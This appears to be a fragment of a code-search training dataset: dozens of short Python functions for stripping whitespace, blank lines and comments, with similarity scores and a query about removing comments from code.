`foo`\n return content.strip('` \\n')", "def test_file_iterator_removes_all_whitespace(self):\n for line in file_iterator('example_module.py'):\n self.assertEqual(line, line.strip())", "def remove_tab_space(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n\n self.result_code = open(\"result.c\", \"w\") # Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line begins with a white space.\n if line[0] == \" \":\n # Checking from which position the code begins over a loop, in order to remove the tab space.\n for c in range(1, len(line)):\n if line[c] != \" \":\n index = c # Making note of the position from which the code begins in the line.\n break\n self.result_code.write(line[index:]) # Writing the line without the tab space into the intermediate file.\n else:\n self.result_code.write(line) # Writing the entire line into the intermediate file in case there is no tab space at the beginning.\n\n self.result_code.close() # Closing the intermediate file.", "def remove_empty_lines(filename):\r\n with open(filename, 'r+') as f:\r\n lines = f.readlines()\r\n f.seek(0)\r\n f.writelines(line for line in lines if line.strip())\r\n f.truncate()", "def rstrip(self) -> String:\n pass", "def clean_file(file_contents):\n commentless_file = _strip_comments(file_contents)\n assembly_code = _remove_whitespace(commentless_file)\n return assembly_code", "def strip_trailing_spaces(self):\n for paragraph in self.paragraphs:\n for item in paragraph:\n lines = paragraph[item].split(\"\\n\")\n paragraph[item] = \"\\n\".join([l.rstrip() for l in lines])", "def clean(text):\n lines = text.split('\\n')\n\n indx = range(len(lines))\n indx.reverse()\n for i in indx:\n temp = lines[i].strip()\n if temp == '' or temp.startswith('#'):\n del lines[i]\n else:\n lines[i] = temp\n\n return lines", "def strip_whitespace(self, text):\n\t\treturn text.strip()", "def cleanup (text) :\n l_idx = 1\n lines = text.split ('\\n')\n\n # count leading non-empty lines\n for line in lines :\n if not 
line.strip () :\n l_idx += 1\n else :\n break\n\n # check if there is anything more to evaluate\n if len (lines) <= l_idx :\n return text\n\n # determine indentation of that line\n indent = 0\n for c in lines[l_idx] :\n if c == ' ' :\n indent += 1\n else : \n break\n\n # if nothing found, check the following line\n if not indent :\n\n if len (lines) <= l_idx + 1:\n return text\n for c in lines[l_idx + 1] :\n if c == ' ' :\n indent += 1\n else : \n break\n\n # if still nothing found, give up\n if not indent :\n return text\n\n\n # oitherwise trim all lines by that indentation\n out = \"\"\n replace = ' ' * indent\n for line in lines :\n out += re.sub (\"%s\" % ' ' * indent, \"\", line)\n out += \"\\n\"\n\n return out", "def lstrip(self) -> String:\n pass", "def clean_comments(self):\n new_lines = list()\n for line in self.lines:\n if ((not line.startswith(\"//\")) & (not line.isspace()) &\n (not line.startswith(\"/*\") & (not line.startswith(\"*/\")))):\n line = Parser.strip_line(line)\n new_lines.append(line)\n self.lines = new_lines", "def strip_space():\n pass", "def _remove_whitespace(file_contents):\n whitespace_stripped = [line.strip() for line in file_contents]\n return [line for line in whitespace_stripped if line != \"\"]", "def test_file_iterator_removes_leading_whitespace(self):\n for line in file_iterator('example_module.py'):\n self.assertFalse(line.startswith(' '))", "def remove_excess_white_space(lines: str):\n two_plus_white_space = r\"\\s{2,}\"\n return re.sub(two_plus_white_space, \"\", lines)", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def remove_psuedoinstructions(file_contents):\n return [line for line in file_contents if not line.startswith(\n PSUEDOINSTRUCTION_INDICATOR)]", "def remove_whitespaces(text: str) -> str:\n return text.lstrip().rstrip()", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def _chop_end_codes(line):\n return re.sub(r\"\\s\\s\\s\\s+[\\w]{4}.\\s+\\d*\\Z\", \"\", line)", "def test_remove_blank_lines(self):\n before_b = \"\"\"\\\n first line\n\n line 1\n line a\n line b\n\n line c\n last line\n \"\"\"\n after_b = \"\"\"\\\n first line\n line 1\n line a\n line b\n line c\n last line\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.0\", \"9.0\"),\n after_sel=(\"1.0\", \"6.9\"),\n command_name=\"remove-blank-lines\",\n )", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def remove_blanks_list(src):\n return [el for el in src if el]", "def clean(source_name):\n with open(source_name, 'r') as f:\n text = f.read()\n text_list = re.split('; |, |\\n| |\\!|\\?', text)\n if '' in text_list:\n text_list = list(filter(lambda x: x != \" \" and x != \"\", text_list))\n return text_list", "def _trim(self, docstring):\n if not docstring:\n return ''\n # Convert tabs to spaces (following the normal Python rules)\n # and split into a list of lines:\n lines = docstring.expandtabs().splitlines()\n # Determine minimum indentation (first line doesn't count):\n indent = sys.maxsize\n 
for line in lines[1:]:\n stripped = line.lstrip()\n if stripped:\n indent = min(indent, len(line) - len(stripped))\n # Remove indentation (first line is special):\n trimmed = [lines[0].strip()]\n if indent < sys.maxsize:\n for line in lines[1:]:\n trimmed.append(line[indent:].rstrip())\n # Strip off trailing and leading blank lines:\n while trimmed and not trimmed[-1]:\n trimmed.pop()\n while trimmed and not trimmed[0]:\n trimmed.pop(0)\n # Return a single string:\n return '\\n'.join(trimmed)", "def clean_data(self):\n for line in self.file:\n if line.startswith('//') or line.isspace():\n continue\n if '//' in line:\n line = line.split('//')[0]\n line = line.replace('\\n', '')\n line = line.replace(' ','')\n self.commands.append(line)", "def emptyline(self):\n self.do_ls(\"\")", "def emptyline(self):\n return", "def emptyline(self):\n return", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def nonempty_lines(text):\n return [line for line in text.split('\\n') if line]", "def __remove_line_numbers(file_contents: str) -> str:\n\n spaces = ' ' * 6\n result = ''\n\n for line in file_contents.splitlines():\n new_line = spaces + line[6:72].rstrip()\n result += new_line + '\\n'\n\n return result", "def clean_code(code):\n return code", "def prepare_file(lines):\n return \" \".join(line.strip() for line in lines)", "def strip(notebook):\n for cell in notebook.cells:\n if cell.cell_type == 'code':\n cell.outputs = []\n cell.execution_count = None", "def remove_empty_lines(file_name):\n removed_lines = 0\n with open(file_name, mode=\"r\", encoding=\"utf-8\") as fd:\n with open(get_output_file(file_name), mode=\"w\", encoding=\"utf-8\") as ofd:\n for line in fd.readlines():\n if re.search(\"^$\", line):\n removed_lines += 1\n else:\n ofd.write(line)\n print(\"Removed lines: {}\".format(removed_lines))", "def ostrip(thefile):\n outlines = []\n with open(thefile, 'r') as f:\n for line in f:\n if line[0] != '%':\n if '%' in line:\n if r'\\%' in line or line[-1] == '%':\n outlines.append(line) # these are not real comments\n else:\n outlines.append(line.split(' %')[0]+'\\n')\n else:\n outlines.append(line)\n return outlines", "def _unmunge_multiline_jinja2(lines):\n start_slug = \"# {# \" + JINJA2_ML_SLUG\n start = len(start_slug)\n stop = len(\" #}\\n\")\n new_lines = []\n for line in lines:\n if line.startswith(start_slug):\n new_lines.append(line[start:-stop] + \"\\n\")\n else:\n new_lines.append(line)\n return new_lines", "def no_blank_line_after_last_section(): # noqa: D416", "def strip_text(text):\n\n return [line.strip() for line in text.splitlines()]", "def strip(self, src):\r\n # single-quoted character\r\n p = \"('.')\"\r\n \r\n # double-quoted string\r\n p += \"|(\\\"(?:[^\\\"\\\\\\\\]|\\\\\\\\.)*\\\")\"\r\n \r\n # single and multi-line comment\r\n p += \"|(//.*?$)|(/\\\\*[^*]*(?:\\\\*(?!/)[^*]*)*\\\\*/)\"\r\n \r\n # pre-processor directive\r\n p += \"|\" + \"(^\\\\s*#.*?$)\"\r\n\r\n regex = re.compile(p, re.MULTILINE)\r\n return regex.sub(' ', src)", "def maybe_remove_new_line(code):\n lines = code.split(\"\\n\")\n\n if lines[0] in [\"py\", \"python\"]:\n # add new line before last line being ```\n lines = lines[:-2] + lines[-1:]\n\n return \"\\n\".join(lines)", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def remove_empty_lines(self, string_list):\r\n string_list2 = []\r\n for strn in string_list:\r\n if strn:\r\n line = strn.strip()\r\n if line == \"\":\r\n continue\r\n else:\r\n 
string_list2.append(line)\r\n return string_list2", "def _reset_leading_whitespace(self):\n self._leading_whitespace = ''", "def _skip_whitespace(self):\n whitespace_re = re.compile(r'\\s*')\n return whitespace_re.match(self.body, self.pos).end()", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def no_underline_and_no_newline(): # noqa: D416", "def rstrip_line(line):\n return line.rstrip()", "def remove_unc(array):\r\n\tnew_arr = []\r\n\r\n\tdef checkForNewLineAndSemiColon(string):\r\n\t\t\"\"\"delete the new-line character and semi-colon from the string\"\"\"\r\n\t\tnew_string = \"\"\r\n\t\tfor i in string:\r\n\t\t\tif i != \"\\n\" and i != \";\":\r\n\t\t\t\tnew_string += i\r\n\t\treturn new_string\r\n\r\n\tfor i in range(len(array)):\r\n\t\tif array[i] != '' and array[i] != \"package\":\r\n\t\t\tnew_arr.append(checkForNewLineAndSemiColon(array[i]))\r\n\r\n\treturn new_arr[0]", "def remove_whitespace_rarity(s, i):\n text = s.replace(' ', '')\n if os.linesep.join([s for s in text.splitlines() if s]) == '':\n return('None')\n else:\n return(os.linesep.join([s for s in text.splitlines() if s]))", "def strip_newlines(text):\n return text.replace('\\n', ' ').replace('\\r', '').rstrip()", "def remove_curl_debug_lines(text: str) -> str:\n lines = text.split(\"\\n\")\n lines = [line for line in lines if not line.startswith(\"**\")]\n return \"\\n\".join(lines)", "def clean_indent(txt):\n return \"\\n\".join(x.strip() for x in txt.splitlines())", "def clean_header(klass, s):\n return re.sub(r\"[\\n\\r\\t]+\", \" \", s).strip()", "def clean_inp(self):\n self.E_str = \"clean_inp\"\n\n # First remove any comment lines\n new_ltxt = []\n for line_num, line in enumerate(self.file_ltxt):\n edit_line, comment = gen_parse.rm_comment_from_line(line)\n edit_line = edit_line.rstrip()\n if edit_line:\n new_ltxt.append(edit_line)\n self.file_ltxt = new_ltxt[:]\n\n # Get line nums for error messages -before the inp cleaning\n self.line_nums = list(range(1, len(self.file_ltxt)+1))\n for line_num in self.line_nums:\n self.file_ltxt_orig[line_num] = self.file_ltxt[line_num - 1]\n self.line_num = 0\n\n self.clean_open_close_brace()", "def list_strip(line: list):\n new_line = [field.strip() for field in line]\n if new_line != line:\n tpl = \"Removed trailing whitespaces in fields of line: {}\"\n msg = tpl.format(line)\n warnings.warn(msg, ParseIsatabWarning)\n return new_line", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text" ]
[ "0.7114437", "0.70919764", "0.7068101", "0.68381476", "0.6802601", "0.6799396", "0.6789069", "0.66894", "0.66618234", "0.66358346", "0.6598233", "0.6583519", "0.6565634", "0.6527385", "0.6515068", "0.6499719", "0.64757967", "0.64706796", "0.6467208", "0.6441668", "0.6440686", "0.643431", "0.6430323", "0.64226955", "0.64226955", "0.6420396", "0.6400788", "0.63433003", "0.633698", "0.6335082", "0.6310171", "0.62877697", "0.6281884", "0.62523764", "0.6248172", "0.62476593", "0.6242683", "0.62370265", "0.6220258", "0.6216033", "0.6215483", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6188429", "0.61845666", "0.61692584", "0.61530954", "0.6152583", "0.6106047", "0.6105662", "0.609959", "0.608714", "0.6085406", "0.6063757", "0.60496235", "0.60496235", "0.6044162", "0.6026976", "0.60070664", "0.6005833", "0.59883356", "0.5985926", "0.59854496", "0.59830076", "0.5982913", "0.5981406", "0.5978803", "0.5976542", "0.59763354", "0.5976014", "0.59721833", "0.59613717", "0.59575087", "0.5953442", "0.5952412", "0.59472567", "0.59294045", "0.5924408", "0.59230465", "0.59177685", "0.5914652", "0.5900389", "0.5877675", "0.5876662", "0.58663875" ]
0.68966925
3
Strips comments from the code
def strip_comments(blob, delim='#'):\n    lines = blob.split('\n')\n    return '\n'.join([line for line in lines if line.strip()[0] != delim])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _removeComments(code):\r\n # remove all occurance streamed comments (/*COMMENT */) from string\r\n text = re.sub(re.compile('/\\*.*?\\*/', re.DOTALL), '', code)\r\n # remove all occurance singleline comments (//COMMENT\\n ) from string\r\n return re.sub(re.compile('//.*?\\n'), '', text)", "def remove_comments(s):\n return \"\\n\".join(l for l in s.strip().split(\"\\n\") if not l.strip().startswith(\"#\"))", "def remove_comments(ls):\r\n for i in range(len(ls)):\r\n ls[i] = re.sub(r'//.*', '', ls[i])\r\n\r\n return ls", "def remove_comments(line):\n hashPos = line.find('#')\n return line[:hashPos] if hashPos >= 0 else line", "def remove_comments(html):\n return re.sub(r\"<!--.*?-->\", \" \", html)", "def strip_comments(line):\n if \"#\" in line:\n return line[:line.find(\"#\")]\n else:\n return line", "def clean_comments(self):\n new_lines = list()\n for line in self.lines:\n if ((not line.startswith(\"//\")) & (not line.isspace()) &\n (not line.startswith(\"/*\") & (not line.startswith(\"*/\")))):\n line = Parser.strip_line(line)\n new_lines.append(line)\n self.lines = new_lines", "def DropComment(text):\n grp = re.compile(r'/\\*[^/]*\\*/').split(text)\n result = string.join(grp);\n grp = re.compile(r'//.*').split(result);\n result = string.join(grp);\n #result = string.join(result.split('\\n')) #remove the line break\n return(' '+result);", "def removeHtmlComments(self, text):\n sb = []\n start = text.find(u'<!--')\n last = 0\n while start != -1:\n end = text.find(u'-->', start)\n if end == -1:\n break\n end += 3 \n \n spaceStart = max(0, start-1)\n spaceEnd = end\n while text[spaceStart] == u' ' and spaceStart > 0:\n spaceStart -= 1\n while text[spaceEnd] == u' ':\n spaceEnd += 1\n \n if text[spaceStart] == u'\\n' and text[spaceEnd] == u'\\n':\n sb.append(text[last:spaceStart])\n sb.append(u'\\n')\n last = spaceEnd+1\n else:\n sb.append(text[last:spaceStart+1])\n last = spaceEnd\n \n start = text.find(u'<!--', end)\n sb.append(text[last:])\n return u''.join(sb)", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def _strip_comments(file_contents):\n lines_without_comments = []\n for line in file_contents:\n comment_position = line.find(COMMENT_INDICATOR)\n if comment_position != -1:\n lines_without_comments.append(line[:comment_position])\n else:\n lines_without_comments.append(line)\n return lines_without_comments", "def strip_comments(source):\n\n tokens = (\n 'PERCENT',\n 'BEGINCOMMENT', 'ENDCOMMENT',\n 'BACKSLASH',\n 'CHAR',\n 'BEGINVERBATIM', 'ENDVERBATIM',\n 'BEGINLISTING', 'ENDLISTING',\n 'NEWLINE',\n 'ESCPCT',\n )\n states = (\n ('linecomment', 'exclusive'),\n ('commentenv', 'exclusive'),\n ('verbatim', 'exclusive'),\n ('listing', 'exclusive'),\n )\n\n #Deal with escaped backslashes, so we don't think they're escaping %.\n def t_BACKSLASH(t):\n r\"\\\\\\\\\"\n return t\n\n #One-line comments\n def t_PERCENT(t):\n r\"\\%\"\n t.lexer.begin(\"linecomment\")\n return None\n\n #Escaped percent signs\n def t_ESCPCT(t):\n r\"\\\\\\%\"\n return t\n\n #Comment environment, as defined by verbatim package\n def t_BEGINCOMMENT(t):\n r\"\\\\begin\\s*{\\s*comment\\s*}\"\n t.lexer.begin(\"commentenv\")\n return None\n\n #Verbatim environment (different treatment of comments within)\n def t_BEGINVERBATIM(t):\n r\"\\\\begin\\s*{\\s*verbatim\\s*}\"\n t.lexer.begin(\"verbatim\")\n return t\n\n #Listings 
environment (different treatment of comments within)\n def t_BEGINLISTING(t):\n r\"\\\\begin\\s*{\\s*lstlisting\\s*}\"\n t.lexer.begin(\"listing\")\n return t\n\n #Any other character in initial state we leave alone\n def t_CHAR(t):\n r\".\"\n return t\n\n def t_NEWLINE(t):\n r\"\\n\"\n return t\n\n #End comment environment\n def t_commentenv_ENDCOMMENT(t):\n r\"\\\\end\\s*{\\s*comment\\s*}\"\n #Anything after \\end{comment} on a line is ignored!\n t.lexer.begin('linecomment')\n return None\n\n #Ignore comments of comment environment\n def t_commentenv_CHAR(t):\n r\".\"\n return None\n\n def t_commentenv_NEWLINE(t):\n r\"\\n\"\n return None\n\n #End of verbatim environment\n def t_verbatim_ENDVERBATIM(t):\n r\"\\\\end\\s*{\\s*verbatim\\s*}\"\n t.lexer.begin('INITIAL')\n return t\n\n #End of listing environment\n def t_listing_ENDLISTING(t):\n r\"\\\\end\\s*{\\s*lstlisting\\s*}\"\n t.lexer.begin('INITIAL')\n return t\n\n #Leave contents of verbatim/listing environment alone\n def t_verbatim_listing_CHAR(t):\n r\".\"\n return t\n\n def t_verbatim_listing_NEWLINE(t):\n r\"\\n\"\n return t\n\n\n #End a % comment when we get to a new line\n def t_linecomment_ENDCOMMENT(t):\n r\"\\n\"\n t.lexer.begin(\"INITIAL\")\n #Newline at the end of a line comment is stripped.\n return None\n\n #Ignore anything after a % on a line\n def t_linecomment_CHAR(t):\n r\".\"\n return None\n\n #Print errors\n def t_ANY_error(t):\n print(t.value, file=sys.stderr)\n\n lexer = ply.lex.lex()\n lexer.input(source)\n return u\"\".join([tok.value for tok in lexer])", "def decomment_and_normalize(s):\n index = s.find(inline_comment_start)\n if index != -1:\n s = s[0:index]\n return s.strip(inline_whitespace)", "def clean_comment(line):\n if line.startswith(\"#!\"):\n line = line[2:]\n else:\n line = line[1:]\n if line.startswith(\" \"):\n line = line[1:]\n if not line.endswith('\\n'):\n line += '\\n'\n return line", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def remove_comments(code):\n state = ReadState.NORMAL\n escape = False\n result = ''\n i = 0\n while i < (len(code)):\n c = code[i]\n if state == ReadState.NORMAL:\n if c == '\"':\n state = ReadState.STRING\n escape = False\n if i + 1 < len(code):\n if c + code[i + 1] == '//':\n state = ReadState.SINGLE_COMMENT\n i += 2\n continue\n if c + code[i + 1] == '/*':\n state = ReadState.MULTI_COMMENT\n i += 2\n continue\n result += c\n elif state == ReadState.STRING:\n if escape:\n escape = False\n else:\n if c == '\"':\n state = ReadState.NORMAL\n if c == '\\\\':\n escape = True\n result += c\n elif state == ReadState.SINGLE_COMMENT:\n if c == '\\n':\n state = ReadState.NORMAL\n result += c\n elif state == ReadState.MULTI_COMMENT:\n if i + 1 < len(code):\n if c + code[i + 1] == '*/':\n state = ReadState.NORMAL\n i += 1\n i += 1\n return result", "def cleanup_comments(comments):\n clean_comments = []\n\n if comments:\n for comment in comments:\n cleaned_up = sub(r'\\n\\n {8}\\n {8}\\n {12}\\n {16}\\n {16}\\n {12}\\nEdit', '', comment)\n clean_comments.append(cleaned_up)\n\n return clean_comments", "def decomment(string):\n pattern = r\"//.*|/\\*[\\s\\S]*?\\*/|(\\\"(\\\\.|[^\\\"])*\\\"|'(\\\\.|[^\\'])*')\"\n regex = re.compile(pattern)\n return regex.sub(lambda m: m.group(1), string)", "def comment():", "def strip_docstring(blob):\n docstring = True\n while 
docstring == True:\n match_docstring = re.search('\\n\\s*\"\"\"[^\"\"\"]*\"\"\"', blob)\n if not match_docstring:\n docstring = False\n else:\n blob = blob.replace(blob[match_docstring.span()[0]:match_docstring.span()[1]], '')\n return blob", "def comment_remover(text):\n\n def replacer(match):\n s = match.group(0)\n if s.startswith(\"/\"):\n return \"\"\n else:\n return s\n\n pattern = re.compile(\n r'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n re.DOTALL | re.MULTILINE,\n )\n return re.sub(pattern, replacer, text)", "def remove_paired_comments(self, program):\n regions = re.compile(\"(/\\*|\\*/)\").split(program)\n depth = 0\n output = []\n for i in range(len(regions)):\n region = regions[i]\n if region==\"/*\":\n depth+=1\n elif region==\"*/\":\n depth-=1\n else:\n #print(\" \"*depth, region.replace(\"\\n\", \"_\"))\n if depth==0:\n output.append(region)\n return \"\".join(output)", "def split_comment(cls, code):\r\n if '#' not in code: return code\r\n #: Remove comments only (leave quoted strings as they are)\r\n subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0)\r\n return re.sub(cls.re_pytokens, subf, code)", "def remove_comment_header(code):\n # get the line number when the comment header ends (incl. empty lines)\n ln_pos = 0\n for line in code.splitlines(True):\n if re.match(r\"[ \\t]*(%|\\n)\", line):\n ln_pos += 1\n else:\n break\n\n if ln_pos > 0:\n # remove the header block and empty lines from the top of the code\n try:\n code = code.split(\"\\n\", ln_pos)[ln_pos:][0]\n except IndexError:\n # only header and empty lines.\n code = \"\"\n\n return code", "def comment_content(c):\n content = str(c)[4:-3]\n return content.strip()", "def remove_comments_and_docstrings(source):\n io_obj = StringIO(source)\n out = \"\"\n prev_toktype = tokenize.INDENT\n last_lineno = -1\n last_col = 0\n for tok in tokenize.generate_tokens(io_obj.readline):\n token_type = tok[0]\n token_string = tok[1]\n start_line, start_col = tok[2]\n end_line, end_col = tok[3]\n ltext = tok[4]\n # The following two conditionals preserve indentation.\n # This is necessary because we're not using tokenize.untokenize()\n # (because it spits out code with copious amounts of oddly-placed\n # whitespace).\n if start_line > last_lineno:\n last_col = 0\n if start_col > last_col:\n out += (\" \" * (start_col - last_col))\n # Remove comments:\n if token_type == tokenize.COMMENT:\n pass\n # This series of conditionals removes docstrings:\n elif token_type == tokenize.STRING:\n if prev_toktype != tokenize.INDENT:\n # This is likely a docstring; double-check we're not inside an operator:\n if prev_toktype != tokenize.NEWLINE:\n # Note regarding NEWLINE vs NL: The tokenize module\n # differentiates between newlines that start a new statement\n # and newlines inside of operators such as parens, brackes,\n # and curly braces. 
Newlines inside of operators are\n # NEWLINE and newlines that start new code are NL.\n # Catch whole-module docstrings:\n if start_col > 0:\n # Unlabelled indentation means we're inside an operator\n out += token_string\n # Note regarding the INDENT token: The tokenize module does\n # not label indentation inside of an operator (parens,\n # brackets, and curly braces) as actual indentation.\n # For example:\n # def foo():\n # \"The spaces before this docstring are tokenize.INDENT\"\n # test = [\n # \"The spaces before this string do not get a token\"\n # ]\n\n else:\n out += token_string\n prev_toktype = token_type\n last_col = end_col\n last_lineno = end_line\n out = '\\n'.join([line for line in out.splitlines() if line.strip()])\n return out", "def comment_stripper(iterator):\n for line in iterator:\n if line [:1] == '#':\n continue\n if not line.strip ():\n continue\n yield line", "def test_remove_single_line_comments_noannotation():\n\n\tinput_ = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t//comment\n\t\t\t\tline3 \"\"\"\n\n\texpect = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t\n\t\t\t\tline3 \"\"\"\n\n\tassert aunit.remove_single_line_comments(input_) == expect", "def _dump_comment(comment: List[str]) -> List[str]:\n return [\"/**\"] + comment + [\"*/\"]", "def remove_comments(css):\n log.debug(\"Removing all Comments.\")\n iemac, preserve = False, False\n comment_start = css.find(\"/*\")\n while comment_start >= 0: # Preserve comments that look like `/*!...*/`.\n # Slicing is used to make sure we dont get an IndexError.\n preserve = css[comment_start + 2:comment_start + 3] == \"!\"\n comment_end = css.find(\"*/\", comment_start + 2)\n if comment_end < 0:\n if not preserve:\n css = css[:comment_start]\n break\n elif comment_end >= (comment_start + 2):\n if css[comment_end - 1] == \"\\\\\":\n # This is an IE Mac-specific comment; leave this one and the\n # following one alone.\n comment_start = comment_end + 2\n iemac = True\n elif iemac:\n comment_start = comment_end + 2\n iemac = False\n elif not preserve:\n css = css[:comment_start] + css[comment_end + 2:]\n else:\n comment_start = comment_end + 2\n comment_start = css.find(\"/*\", comment_start)\n return css", "def strip_comments(tokens):\n prev_typ = None\n prev_end_col = 0\n for typ, tok, (start_row, start_col), (end_row, end_col), line in tokens:\n if typ in (tokenize.NL, tokenize.NEWLINE):\n if prev_typ in (tokenize.NL, tokenize.NEWLINE):\n start_col = 0\n else:\n start_col = prev_end_col\n end_col = start_col + 1\n elif typ == tokenize.COMMENT and start_row > 2:\n continue\n prev_typ = typ\n prev_end_col = end_col\n yield typ, tok, (start_row, start_col), (end_row, end_col), line", "def remove_c_style_comments(fd):\n ret = []\n comment_state = False\n for line in fd:\n while True:\n # seems we have nothing left\n if len(line) < 2:\n break\n # we're still inside a comment\n if comment_state:\n idx = line.find(\"*/\")\n if idx > -1:\n line = line[idx + 2:]\n comment_state = False\n continue\n # comment doesn't seem to end on this line\n break\n # we're not inside any comment\n else:\n idx = line.find(\"/*\")\n if idx > -1:\n line = line[idx + 2:]\n comment_state = True\n continue\n if \"//\" in line:\n line = line.split(\"//\", 1)[0]\n # only now we can actually do our job\n line = line.strip()\n if len(line) > 0:\n ret.append(line)\n break\n return ret", "def _StripCommentFromLine(line):\n\n m = re.match(r'(.*)//', line)\n if m:\n return m.group(1).strip() + '\\n'\n else:\n return line", "def strip_comments(string, 
comment_symbols=frozenset(('#', '//'))): # pragma: no cover\n lines = string.splitlines()\n for k in range(len(lines)):\n for symbol in comment_symbols:\n lines[k] = strip_comment_line_with_symbol(lines[k], start=symbol)\n return '\\n'.join(lines)", "def remove_starting_comments(sql: str) -> str:\n commentless_sql = sql\n while True:\n start_comment = COMMENT_START_SQL_RE.match(commentless_sql)\n if start_comment is None:\n break\n commentless_sql = commentless_sql[start_comment.end() :]\n return commentless_sql", "def deleteComments(self: Self, event: Event = None) -> None:\n #@+<< deleteComments docstring >>\n #@+node:ekr.20171123135625.37: *3* << deleteComments docstring >>\n #@@pagewidth 50\n #@-<< deleteComments docstring >>\n c, p, u, w = self, self.p, self.undoer, self.frame.body.wrapper\n #\n # \"Before\" snapshot.\n bunch = u.beforeChangeBody(p)\n #\n # Initial data.\n head, lines, tail, oldSel, oldYview = self.getBodyLines()\n if not lines:\n g.warning('no text selected')\n return\n # The default language in effect at p.\n language = c.frame.body.colorizer.scanLanguageDirectives(p)\n if c.hasAmbiguousLanguage(p):\n language = c.getLanguageAtCursor(p, language)\n d1, d2, d3 = g.set_delims_from_language(language)\n #\n # Calculate the result.\n changed, result = False, []\n if d1:\n # Remove the single-line comment delim in front of each line\n d1b = d1 + ' '\n n1, n1b = len(d1), len(d1b)\n for s in lines:\n i = g.skip_ws(s, 0)\n if g.match(s, i, d1b):\n result.append(s[:i] + s[i + n1b :])\n changed = True\n elif g.match(s, i, d1):\n result.append(s[:i] + s[i + n1 :])\n changed = True\n else:\n result.append(s)\n else:\n # Remove the block comment delimiters from each line.\n n2, n3 = len(d2), len(d3)\n for s in lines:\n i = g.skip_ws(s, 0)\n j = s.find(d3, i + n2)\n if g.match(s, i, d2) and j > -1:\n first = i + n2\n if g.match(s, first, ' '):\n first += 1\n last = j\n if g.match(s, last - 1, ' '):\n last -= 1\n result.append(s[:i] + s[first:last] + s[j + n3 :])\n changed = True\n else:\n result.append(s)\n if not changed:\n return\n #\n # Set p.b and w's text first.\n middle = ''.join(result)\n p.b = head + middle + tail # Sets dirty and changed bits.\n w.setAllText(head + middle + tail)\n #\n # Set the selection range and scroll position.\n i = len(head)\n j = ins = max(i, len(head) + len(middle) - 1)\n w.setSelectionRange(i, j, insert=ins)\n w.setYScrollPosition(oldYview)\n #\n # \"after\" snapshot.\n u.afterChangeBody(p, 'Indent Region', bunch)", "def ostrip(thefile):\n outlines = []\n with open(thefile, 'r') as f:\n for line in f:\n if line[0] != '%':\n if '%' in line:\n if r'\\%' in line or line[-1] == '%':\n outlines.append(line) # these are not real comments\n else:\n outlines.append(line.split(' %')[0]+'\\n')\n else:\n outlines.append(line)\n return outlines", "def strip_comments(string, comment_symbols=frozenset(('#', '//'))):\n lines = string.splitlines()\n for k in range(len(lines)):\n for symbol in comment_symbols:\n lines[k] = strip_comment_line_with_symbol(lines[k], start=symbol)\n return '\\n'.join(lines)", "def filter_comments(asm_utf):\n comments = []\n # removes nones\n a = filter(lambda x: x != None, asm_utf)\n # splits on comment token\n comments = [re.split(\";\", line) for line in a]\n # takes only those that have a comment token\n comments = list(filter(lambda x: len(x) > 1, comments))\n # strips the whitespace from those tokens\n comments = [line[1].strip() for line in comments]\n # removes the singleton chars\n comments = list(filter(lambda x: len(x) > 1, 
